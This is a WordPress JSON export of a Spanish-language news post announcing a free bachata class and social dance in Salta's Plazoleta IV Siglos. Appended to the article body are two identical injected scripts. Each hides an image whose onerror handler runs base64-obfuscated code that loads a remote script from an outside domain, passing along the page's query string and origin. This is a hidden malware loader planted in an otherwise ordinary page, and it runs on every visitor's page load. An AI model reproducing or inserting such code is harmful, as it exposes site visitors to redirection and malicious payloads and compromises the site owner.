{"id":4788,"date":"2025-01-30T09:16:10","date_gmt":"2025-01-30T12:16:10","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4788"},"modified":"2025-08-13T23:41:37","modified_gmt":"2025-08-14T02:41:37","slug":"el-municipio-invita-hoy-a-punto-bachata-en-la-plazoleta-iv-siglos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4788","title":{"rendered":"El municipio invita hoy a \u201cPunto Bachata\u201d en la Plazoleta IV Siglos"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-e2214ed38a9521b55e24306a9ca50748\" style=\"background-color:#055c8f\"><strong><em>Comenzar\u00e1 a las 20 hs con una clase y continuar\u00e1 con un \u201cBaile Social\u201d hasta las 23 hs, con entrada libre y gratuita. Los fan\u00e1ticos de este ritmo latino disfrutar\u00e1n este jueves 30 de una noche a puro baile y m\u00fasica en el microcentro de la ciudad<\/em>.<\/strong><\/h4>\n\n\n\n<p>En este verano la Agencia de Cultura Activa a trav\u00e9s de la Municipalidad invita a salte\u00f1os y turistas a participar de las actividades que se llevar\u00e1n adelante en diferentes espacios de la ciudad.<\/p>\n\n\n\n<p>En esta oportunidad se realizar\u00e1 \u201cPunto Bachata\u201d en la Plazoleta IV Siglos a cargo de \u201cSocial Party\u201d junto a Cecilia Momp\u00f3. Una iniciativa que busca fomentar la cultura del baile y generar espacios de encuentro para los amantes de la m\u00fasica latina. Ella resalta: \u201cque el baile sea siempre la forma de conectar, la idea es bailar y compartir un lindo momento\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"681\" data-id=\"4791\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/bachata-ilustrativa-1-scaled-1-1024x681.webp\" alt=\"\" class=\"wp-image-4791\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/bachata-ilustrativa-1-scaled-1-1024x681.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/bachata-ilustrativa-1-scaled-1-300x200.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/bachata-ilustrativa-1-scaled-1-768x511.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/bachata-ilustrativa-1-scaled-1-1536x1022.webp 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/bachata-ilustrativa-1-scaled-1-2048x1362.webp 2048w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/bachata-ilustrativa-1-scaled-1-631x420.webp 631w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/bachata-ilustrativa-1-scaled-1-696x463.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/bachata-ilustrativa-1-scaled-1-1068x710.webp 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/bachata-ilustrativa-1-scaled-1-1920x1277.webp 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"669\" height=\"446\" data-id=\"4789\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/bachata-ilustrativa-2-jpg.webp\" alt=\"\" class=\"wp-image-4789\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/bachata-ilustrativa-2-jpg.webp 669w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/bachata-ilustrativa-2-jpg-300x200.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/bachata-ilustrativa-2-jpg-630x420.webp 630w\" sizes=\"(max-width: 669px) 100vw, 669px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"4790\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/ilustrativa-foto-bachata-1-jpeg-1024x683.webp\" alt=\"\" class=\"wp-image-4790\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/ilustrativa-foto-bachata-1-jpeg-1024x683.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/ilustrativa-foto-bachata-1-jpeg-300x200.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/ilustrativa-foto-bachata-1-jpeg-768x513.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/ilustrativa-foto-bachata-1-jpeg-629x420.webp 629w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/ilustrativa-foto-bachata-1-jpeg-696x464.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/ilustrativa-foto-bachata-1-jpeg-1068x713.webp 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/01\/ilustrativa-foto-bachata-1-jpeg.webp 1500w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>El evento comenzar\u00e1 a las 20 horas con una clase abierta de bachata dictada por profesores invitados y continuar\u00e1 con un \u00abBaile Social\u00bb hasta las 23 horas.<\/p>\n\n\n\n<p>La propuesta, con entrada libre y gratuita, est\u00e1 destinada a todos aquellos que quieran dar sus primeros pasos en esta danza, como as\u00ed tambi\u00e9n a bailarines.<\/p>\n\n\n\n<p>Este jueves 30 de enero ser\u00e1 la oportunidad perfecta para sumergirse en el mundo de la bachata y disfrutar de una noche diferente llena de m\u00fasica, diversi\u00f3n y baile.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/prensa.municipalidadsalta.gob.ar\/el-municipio-invita-manana-a-punto-bachata-en-la-plazoleta-iv-siglos\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/prensa.municipalidadsalta.gob.ar\/wp-content\/uploads\/2022\/03\/logo-salta-2024-jpg.webp\" alt=\"\" style=\"width:227px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Comenzar\u00e1 a las 20 hs con una clase y continuar\u00e1 con un \u201cBaile Social\u201d hasta las 23 hs, con entrada libre y gratuita. Los fan\u00e1ticos de este ritmo latino disfrutar\u00e1n este jueves 30 de una noche a puro baile y m\u00fasica en el microcentro de la ciudad. En este verano la Agencia de Cultura Activa [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4789,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17],"tags":[],"class_list":{"0":"post-4788","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4788"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4788"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4788\/revisions"}],"predecessor-version":[{"id":6584,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4788\/revisions\/6584"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4789"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4788"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4788"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4788"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}